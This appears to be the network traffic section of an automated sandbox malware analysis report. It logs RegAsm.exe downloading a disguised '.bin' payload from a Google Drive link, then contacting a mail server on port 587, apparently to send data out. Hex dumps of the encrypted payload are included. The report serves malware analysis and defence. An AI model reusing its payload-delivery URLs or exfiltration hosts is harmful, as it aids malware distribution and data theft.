                                                                          Oct 13, 2021 16:18:11.483043909 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483181000 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483190060 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483211040 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483339071 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483355999 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483371973 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483478069 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483519077 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483539104 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483627081 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483674049 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483692884 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483783007 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483834028 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483855009 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.483932972 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.483989000 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484004021 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484019995 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484112978 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484131098 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484146118 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484303951 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484338045 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484364033 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484446049 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484462976 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484477997 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484626055 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484651089 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484780073 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484798908 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.484816074 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.484919071 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.485016108 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.485182047 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485194921 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.485219002 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.485227108 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485234976 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485313892 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:18:11.485393047 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485419989 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485438108 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485537052 CEST49788443192.168.11.20142.250.181.225
                                                                          Oct 13, 2021 16:18:11.485570908 CEST44349788142.250.181.225192.168.11.20
                                                                          Oct 13, 2021 16:19:47.811885118 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:19:47.862668991 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:19:47.862888098 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.013747931 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.014467955 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.065952063 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.066353083 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.120260954 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.123229027 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.185601950 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.185688019 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.185741901 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.185897112 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.203094006 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:03.255235910 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:03.296063900 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.298297882 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.349469900 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.350773096 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.402456999 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.402961016 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.493314028 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.538985014 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.539693117 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.590747118 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.591161966 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.656584024 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.656970978 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.708055019 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.748833895 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.761172056 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.761208057 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.761269093 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.761280060 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:20:04.812485933 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.812541962 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.812578917 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.812614918 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.858952045 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:20:04.905014038 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:21:27.652569056 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:21:27.705387115 CEST58749795188.93.227.195192.168.11.20
                                                                          Oct 13, 2021 16:21:27.705612898 CEST49795587192.168.11.20188.93.227.195
                                                                          Oct 13, 2021 16:21:27.705930948 CEST49795587192.168.11.20188.93.227.195

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 13, 2021 16:18:10.319319010 CEST6096853192.168.11.201.1.1.1
                                                                          Oct 13, 2021 16:18:10.343991041 CEST53609681.1.1.1192.168.11.20
                                                                          Oct 13, 2021 16:18:11.163135052 CEST6374153192.168.11.201.1.1.1
                                                                          Oct 13, 2021 16:18:11.193228960 CEST53637411.1.1.1192.168.11.20
                                                                          Oct 13, 2021 16:19:47.618597031 CEST5815453192.168.11.201.1.1.1
                                                                          Oct 13, 2021 16:19:47.758398056 CEST53581541.1.1.1192.168.11.20
                                                                          Oct 13, 2021 16:20:03.581471920 CEST5156353192.168.11.201.1.1.1

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Oct 13, 2021 16:18:10.319319010 CEST192.168.11.201.1.1.10x32b9Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:18:11.163135052 CEST192.168.11.201.1.1.10x9340Standard query (0)doc-04-88-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:19:47.618597031 CEST192.168.11.201.1.1.10xe12dStandard query (0)mail.tccinfaes.comA (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:20:03.581471920 CEST192.168.11.201.1.1.10x64dcStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Oct 13, 2021 16:18:10.343991041 CEST1.1.1.1192.168.11.200x32b9No error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:18:11.193228960 CEST1.1.1.1192.168.11.200x9340No error (0)doc-04-88-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                          Oct 13, 2021 16:18:11.193228960 CEST1.1.1.1192.168.11.200x9340No error (0)googlehosted.l.googleusercontent.com142.250.181.225A (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:19:47.758398056 CEST1.1.1.1192.168.11.200xe12dNo error (0)mail.tccinfaes.comtccinfaes.comCNAME (Canonical name)IN (0x0001)
                                                                          Oct 13, 2021 16:19:47.758398056 CEST1.1.1.1192.168.11.200xe12dNo error (0)tccinfaes.com188.93.227.195A (IP address)IN (0x0001)
                                                                          Oct 13, 2021 16:20:03.591273069 CEST1.1.1.1192.168.11.200x64dcNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • drive.google.com
                                                                          • doc-04-88-docs.googleusercontent.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.2049787172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2021-10-13 14:18:10 UTC0OUTGET /uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2021-10-13 14:18:11 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Wed, 13 Oct 2021 14:18:11 GMT
                                                                          Location: https://doc-04-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1m9q33vpcq2d9i6097uacpkl7/1634134650000/00014782062933200622/*/1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ?e=download
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Content-Security-Policy: script-src 'nonce-MfnY3OyBqGOxw8Ypa/jL8w' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Server: GSE
                                                                          Set-Cookie: NID=511=KMjs-PEAw-102GqTRJPU-g_A3-4vxr7mUXr8DT5BPlrxCf45Qhsqo40oox7oUmlf06N5eLwbgQPgw5w2W5nyQ4PODNrZoIac7Y3qCX-KVpyWwqpfOrrxH_BEAl4zg-ApQRkkqVRaMEXCOpjPmYpfHquiSO3DCZ4ZezuksMPd75U; expires=Thu, 14-Apr-2022 14:18:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2021-10-13 14:18:11 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 38 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 6f 31 6e
                                                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1n
                                                                          2021-10-13 14:18:11 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.11.2049788142.250.181.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2021-10-13 14:18:11 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1m9q33vpcq2d9i6097uacpkl7/1634134650000/00014782062933200622/*/1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ?e=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Cache-Control: no-cache
                                                                          Host: doc-04-88-docs.googleusercontent.com
                                                                          Connection: Keep-Alive
                                                                          2021-10-13 14:18:11 UTC2INHTTP/1.1 200 OK
                                                                          X-GUploader-UploadID: ADPycdtV1Gxf15GrMT6MoirIX6L6S-ch5L_mHWmqk0yLMZTC2MSaxoglQ_a-AslfkD-tVzmUEExZRU5s3fPy1YQRMTI
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                          Access-Control-Allow-Methods: GET,OPTIONS
                                                                          Content-Type: application/octet-stream
                                                                          Content-Disposition: attachment;filename="NAPPY BOI_ebVHZ221.bin";filename*=UTF-8''NAPPY%20BOI_ebVHZ221.bin
                                                                          Content-Length: 221760
                                                                          Date: Wed, 13 Oct 2021 14:18:11 GMT
                                                                          Expires: Wed, 13 Oct 2021 14:18:11 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=yYWLoQ==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                          Connection: close
                                                                          2021-10-13 14:18:11 UTC5INData Raw: c5 7c f1 7a 92 3a eb ba 10 ed 1c bd cd 0c b7 e8 98 5a 1e 65 97 d5 0c 8b f4 ac a4 5b 94 f9 1e eb 2a 56 e8 cf 5e 14 6e 54 81 ed 90 dc 9f a0 4f b3 bf 82 0e 0f 0f 65 81 43 5e c3 87 ff ab a4 cd 33 a0 61 2d 4d 5d 7b d7 8d a0 56 70 e1 0b 70 ca 67 6f 00 dc 67 b8 2d f4 8d 75 a1 7d be 36 5a 08 5d 02 30 bf ec e0 06 80 85 88 6d e1 73 75 c6 ed 6b a6 3d 44 1b 32 96 66 7f 19 e4 5b 5a 20 12 6f f8 84 71 32 ac 51 c2 ea db 09 06 06 e1 7d 65 bf 00 30 a3 9a db 96 81 d8 b6 9b 34 a5 68 65 d2 f0 2e 22 82 bb 0e 0d 04 3b 41 71 66 e3 fb 78 2b 9c a9 73 15 28 73 b7 45 42 8a 49 36 24 64 b3 74 0e 2a 54 8d bb 51 a5 42 73 84 0c 65 65 69 e5 b2 67 16 8c 95 b4 ef 99 34 77 6e 2a 36 cc dc 80 12 cc 78 fe f8 a5 6c ed 94 58 ee a3 80 03 82 59 c2 34 5e 84 39 c7 ec 53 95 bb 92 7d 18 c8 ba e1 64 71
                                                                          Data Ascii: |z:Ze[*V^nTOeC^3a-M]{Vppgog-u}6Z]0msuk=D2f[Z oq2Q}e04he.";Aqfx+s(sEBI6$dt*TQBseeig4wn*6xlXY4^9S}dq
                                                                          2021-10-13 14:18:11 UTC9INData Raw: 7d 11 56 41 05 a5 ff 8b c7 c4 bc f1 76 bd b0 25 3b d3 ad df a2 9d eb 91 6a 31 12 d8 0b 4c 86 c3 42 3f ed f7 15 65 c8 c0 58 5e a4 07 66 e5 bd 3e 19 fc 0b 27 af d4 b8 3c e7 54 a1 ae a0 60 af b9 58 b1 ea 63 0f 44 f2 5f d5 47 6f 77 13 09 38 db 96 b8 d4 1a 5b d5 37 83 e9 5e 53 2c d5 8a 9e b3 d0 b4 62 67 81 b6 39 5a 61 a6 a6 c1 aa 4e 75 80 4c d1 e2 22 3e 86 8e 83 53 8f f2 1f 80 c2 db 37 e0 66 d1 8c b0 28 e0 51 d2 c8 03 a0 d3 2e de ca cb 2b 36 4a be 5c e7 fa fd 6b bb 3e 0a c4 b5 e4 27 d7 cc 37 bf da 21 2f 15 a5 84 f0 44 cb dc 01 ac f1 6e 6b 80 2f c4 e1 a8 d7 32 15 50 b7 05 b3 c7 c3 b3 6b 24 69 bf 2d 45 af 36 a9 b2 34 c3 f0 e3 96 65 92 a5 16 1a 23 91 fd 7e 10 66 4a 51 b4 1b d2 08 c0 72 48 6a 34 14 8b 36 39 0e 9a a7 39 7e 49 a9 ba ef 4b d8 fe 1d 8f e4 18 84 0a 28
                                                                          Data Ascii: }VAv%;j1LB?eX^f>'<T`XcD_Gow8[7^S,bg9ZaNuL">S7f(Q.+6J\k>'7!/Dnk/2Pk$i-E64e#~fJQrHj4699~IK(
                                                                          2021-10-13 14:18:11 UTC13INData Raw: af 5c ac ec 05 fc 8d ce 6d e4 3b 1f 9d 18 31 36 4a a9 cb dc b4 5b fe c8 d6 ae 37 28 32 33 94 aa 73 99 1b 5d 56 aa 1b 85 21 70 c2 2c a9 25 f6 f6 e6 53 e6 27 d4 e8 d5 c6 2b 09 ec 22 8f 7c 1a 75 a1 94 6a df e3 f9 fc 21 16 10 38 41 40 8d 74 4a 9b 41 d6 cf e2 96 40 77 d1 62 b5 44 8b 1b e8 02 a2 e0 d6 d0 a9 c2 1a cf 9c e3 1f db 4e 8c 28 ef 38 02 2d e8 cc 50 c0 bf 5c 64 52 7a 04 2e 90 af 10 c3 34 c9 cf 3e 08 5c 5b 47 fc 37 c3 e5 ac 34 af 83 65 ea 3a b0 f6 ae 08 30 2e de 06 35 f1 fa 0b 53 be ef c0 b7 ad 06 7b 00 42 4a 2e e7 c0 f6 c5 bc a0 a9 2a 84 86 26 d8 dc d4 44 0a 2c 11 6c 00 36 10 09 78 49 b5 f5 33 ac 0f 3a 64 69 27 1f 2b 35 1f 0d 34 cf c1 bb fa bb be fd 41 4c ef 9c e5 0b 60 d4 e9 13 59 fd b3 a4 5f 26 5f 2d 6d bd 26 4a c6 78 3b f7 b6 34 50 28 1c a8 23 f9 9b
                                                                          Data Ascii: \m;16J[7(23s]V!p,%S'+"|uj!8A@tJA@wbDN(8-P\dRz.4>\[G74e:0.5S{BJ.*&D,l6xI3:di'+54AL`Y_&_-m&Jx;4P(#
                                                                          2021-10-13 14:18:11 UTC16INData Raw: 58 7d 03 99 d8 73 74 28 42 ce bb be 6b 2b c7 99 aa 9b 75 a6 a3 b2 39 de 98 01 c9 5f c8 e3 af 61 67 e8 31 e8 29 2f 7f 60 e3 eb ec e0 6a dd 2b 08 68 e1 ce 1b 3d 7b 1e 24 56 69 36 2a d8 b1 23 3c 73 36 18 19 c2 c4 de e6 6f d6 9a e7 b1 68 42 5e 58 d6 fe 9f 61 60 10 be ff 56 eb 13 9a 4d 5e 71 ff d3 a4 56 76 f2 d8 a7 77 65 d7 06 cd 4f 90 7f f6 8d 33 89 5a be 36 50 20 03 02 30 b9 ff c7 2e 41 87 88 6b ed 62 5c d5 e4 7a 8b 37 55 37 21 90 77 76 76 2d 5b 5a aa 05 91 fa 82 01 41 a2 51 7c f4 e8 2a de 01 c2 79 44 eb 62 4e 2e b8 f4 f5 e8 d0 0d fa 59 8f 1c fa be c1 78 60 a3 d9 6b 53 78 4e 2f 55 63 a5 19 3e 64 c9 a1 d4 7a 4c 1c d9 c3 4f 80 6d 27 21 4c d8 76 0e 2c 2c 0b b9 51 ef 59 fd 91 1f 51 01 1b a5 a3 27 00 a4 51 b6 ef 7f 3c 5d ab 23 37 c1 f4 a7 4a cf 72 5c e1 e5 7b c5
                                                                          Data Ascii: X}st(Bk+u9_ag1)/`j+h={$Vi6*#<s6ohB^Xa`VM^qVvweO3Z6P 0.Akb\z7U7!wvv-[ZAQ|*yDbN.Yx`kSxN/Uc>dzLOm'!Lv,,QYQ'Q<]#7Jr\{
                                                                          2021-10-13 14:18:11 UTC18INData Raw: 4e c6 9c e1 4b d2 4d 1d 6a 54 1b 44 08 29 0a ca cd e8 7a 4d 85 a9 bc 83 2a ee 6c 95 b7 de 81 78 c3 2a bb ee 16 0d b2 7d 84 c4 20 fa ab 19 f5 fb 28 1b b8 21 02 29 5c 5d d9 cd ab 36 e4 e0 ee aa 1b 79 f0 01 86 ae 73 f6 11 42 43 50 02 e9 b6 79 ea 57 b2 a8 e9 fd f9 44 e6 63 c5 b9 c7 f1 ed f5 ed 08 21 64 46 4a af 81 6a d9 45 ce b3 30 12 16 01 12 59 73 73 09 e8 48 ce bb 58 87 00 6b 5b 26 a4 40 8d a8 fd 54 45 c9 83 d3 be db 0d 8d 9f a5 7e d5 b0 8d 00 c5 69 07 15 09 93 be 7f a2 0a 1b 50 7a 06 a4 a5 ef 38 b2 1e c9 c5 16 7c 6e 59 41 dc 1e c3 e5 a2 25 a8 fd a1 e1 11 a1 de 79 1d ce 29 da 2a 2f fa fc 63 3d 40 ee e6 9d d2 0f 7b 01 72 c8 2f cb c8 f5 e9 97 43 87 82 0b 86 20 da dc 78 44 0a 2c 2d 09 05 1e 2e 21 e3 43 6b 81 52 a8 83 65 60 70 15 41 98 a2 1f 07 21 ed 65 e4 fa
                                                                          Data Ascii: NKMjTD)zM*lx*} (!)\]6ysBCPyWDc!dFJjE0YssHXk[&@TE~iPz8|nYA%y)*/c=@{r/C xD,-.!CkRe`pA!e
                                                                          2021-10-13 14:18:11 UTC19INData Raw: bf ec fa 06 80 84 88 6d e1 73 15 cf ed 6b a8 3d 44 1b 5c 9f 66 7f 16 e4 5b 5a ba 12 6f f9 8a 6e 88 a2 2c 7f e3 16 26 be 07 ad 3b 4d eb 68 56 d0 ba ab fe ee bf c5 fa 59 85 0b 9e b5 9e 41 58 a2 d9 6b 85 7f 4e 2f 5d 0f 8d db 26 64 cf 88 1e 7a 4c 16 2d 41 4f 80 63 36 24 64 71 7d 0e 2a 0b c8 bb 51 f3 43 70 85 1f 51 00 08 34 bb 67 16 82 95 b4 ef a6 3d 75 6f 2e 37 c7 dc 9a 4a cf 79 fe f0 a5 6c 03 9d 58 ee f3 f6 00 82 a5 eb 34 5e 8b 39 c7 ec 49 95 fb 93 7d 38 c8 ba ea 6c 71 ec de 14 a3 c8 32 b6 95 4b 8e fd 88 a3 fc e0 7b 71 a5 30 f3 db de eb 7e 6e 1b 47 45 6a c5 f5 8b cd db b9 e0 73 ad 6e 15 33 ff ab d6 cd 88 e1 91 60 e3 cc d2 03 30 8a cb 2d 67 ed f7 1f a3 e0 ee 5b 5e a2 0d b8 a8 9f 09 19 f2 01 0f 81 bb b2 3a ed 70 99 ae a0 70 71 b9 5f 9b ea 63 0f 3c d0 5f d5 4b
                                                                          Data Ascii: msk=D\f[Zon,&;MhVYAXkN/]&dzL-AOc6$dq}*QCpQ4g=uo.7JylX4^9I}8lq2K{q0~nGEjsn3`0-g[^:ppq_c<_K
